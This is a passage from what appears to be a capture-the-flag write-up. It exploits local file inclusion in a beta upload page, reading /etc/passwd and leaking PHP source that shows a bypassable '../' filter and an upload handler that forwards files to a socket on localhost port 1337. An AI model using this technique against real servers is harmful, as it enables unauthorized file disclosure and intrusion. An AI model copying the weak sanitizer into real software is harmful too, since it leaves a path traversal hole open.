File Upload Feature
Interesting beta page which allows for file uploads.
However, uploading a file produces no useful reply from the server... Moreover, I also do not know if my uploads are stored in a certain part of the server or they are processed somehow.
To understand more, perhaps the webpage is vulnerable to LFI...? (Since the format of the URL seems very suspicious).
Local File Inclusion
Trying out the usual /etc/passwd, I managed to get something juicy. This confirms that the page is vulnerable to LFI!
Now, it is time to leak the source code for the web pages! Using the same method, we can leak the php source code for index.php and activate_license.php (which is used during the file upload).
- index
- Activate License
<?php
function sanitize_input($param) {
$param1 = str_replace("../","",$param);
$param2 = str_replace("./","",$param1);
return $param2;
}
$page = $_GET['page'];
if (isset($page) && preg_match("/^[a-z]/", $page)) {
$page = sanitize_input($page);
} else {
header('Location: /index.php?page=default.html');
}
readfile($page);
?>
<?php
if(isset($_FILES['licensefile'])) {
$license = file_get_contents($_FILES['licensefile']['tmp_name']);
$license_size = $_FILES['licensefile']['size'];
$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if (!$socket) { echo "error socket_create()\n"; }
if (!socket_connect($socket, '127.0.0.1', 1337)) {
echo "error socket_connect()" . socket_strerror(socket_last_error()) . "\n";
}
socket_write($socket, pack("N", $license_size));
socket_write($socket, $license);
socket_shutdown($socket);
socket_close($socket);
}
?>
Internal Connection
The upload feature seem to be uploading the data by sending it to a socket listening on localhost port 1337. Pretty 1337!
However, the lack of any output means that more enumeration has to be done. Let's use /proc to discover running processes in the system.